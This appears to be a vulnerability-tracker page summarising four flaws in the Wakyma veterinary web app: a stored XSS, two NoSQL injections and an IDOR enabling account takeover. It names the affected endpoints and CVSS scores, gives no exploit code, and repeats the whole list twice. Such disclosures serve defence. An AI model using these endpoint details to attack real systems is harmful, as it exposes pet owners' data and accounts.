Wakyma Application Web
Monthly
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Wakyma veterinary web application at the endpoint 'vets.wakyma.com/configuracion/agenda/modelo-formulario-evento', allowing authenticated users with low privileges to inject malicious scripts that persist in the application and execute in the browsers of other users, potentially enabling unauthorized data access and privilege escalation across the veterinary team. The vulnerability has a CVSS v4.0 base score of 4.8 (low-to-medium severity) but poses meaningful organizational risk due to its stored nature and the ability for low-privileged users to affect higher-privileged team members. No public exploit code or active exploitation in the wild has been reported at this time, though the attack requires only Network access and user interaction, making it feasible for insider threats.
A non-relational SQL injection (NoSQLi) vulnerability exists in the Wakyma web application's 'vets.wakyma.com/pets/print-tags' endpoint that allows authenticated users to inject NoSQL commands via manipulated POST requests. An attacker with valid credentials can exploit this vulnerability to extract sensitive information including pet names and owner names from the backend database. With a CVSS score of 5.3 and low attack complexity, this represents a moderate confidentiality risk requiring prompt remediation despite the requirement for authentication.
A non-relational SQL injection (NoSQLi) vulnerability exists in the Wakyma veterinary web application, specifically in the hospitalization summary generation endpoint at vets.wakyma.com. Authenticated users with low privileges can inject NoSQL commands into POST requests to exfiltrate customer reports containing sensitive veterinary and pet owner data. The vulnerability has a high CVSS score of 7.1 but requires authentication, limiting the attack surface to users with valid credentials.
An identity-based authorization bypass vulnerability (IDOR) allows authenticated attackers to modify other users' account data, including email addresses, and subsequently hijack accounts through password reset flows. The vulnerability affects an unspecified product with a CVSS 8.6 severity rating, requires only low privileges to exploit over the network, and enables complete account takeover. No active exploitation has been reported (not in KEV), no public proof-of-concept exists, and the EPSS score is unavailable.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Wakyma veterinary web application at the endpoint 'vets.wakyma.com/configuracion/agenda/modelo-formulario-evento', allowing authenticated users with low privileges to inject malicious scripts that persist in the application and execute in the browsers of other users, potentially enabling unauthorized data access and privilege escalation across the veterinary team. The vulnerability has a CVSS v4.0 base score of 4.8 (low-to-medium severity) but poses meaningful organizational risk due to its stored nature and the ability for low-privileged users to affect higher-privileged team members. No public exploit code or active exploitation in the wild has been reported at this time, though the attack requires only Network access and user interaction, making it feasible for insider threats.
A non-relational SQL injection (NoSQLi) vulnerability exists in the Wakyma web application's 'vets.wakyma.com/pets/print-tags' endpoint that allows authenticated users to inject NoSQL commands via manipulated POST requests. An attacker with valid credentials can exploit this vulnerability to extract sensitive information including pet names and owner names from the backend database. With a CVSS score of 5.3 and low attack complexity, this represents a moderate confidentiality risk requiring prompt remediation despite the requirement for authentication.
A non-relational SQL injection (NoSQLi) vulnerability exists in the Wakyma veterinary web application, specifically in the hospitalization summary generation endpoint at vets.wakyma.com. Authenticated users with low privileges can inject NoSQL commands into POST requests to exfiltrate customer reports containing sensitive veterinary and pet owner data. The vulnerability has a high CVSS score of 7.1 but requires authentication, limiting the attack surface to users with valid credentials.
An identity-based authorization bypass vulnerability (IDOR) allows authenticated attackers to modify other users' account data, including email addresses, and subsequently hijack accounts through password reset flows. The vulnerability affects an unspecified product with a CVSS 8.6 severity rating, requires only low privileges to exploit over the network, and enables complete account takeover. No active exploitation has been reported (not in KEV), no public proof-of-concept exists, and the EPSS score is unavailable.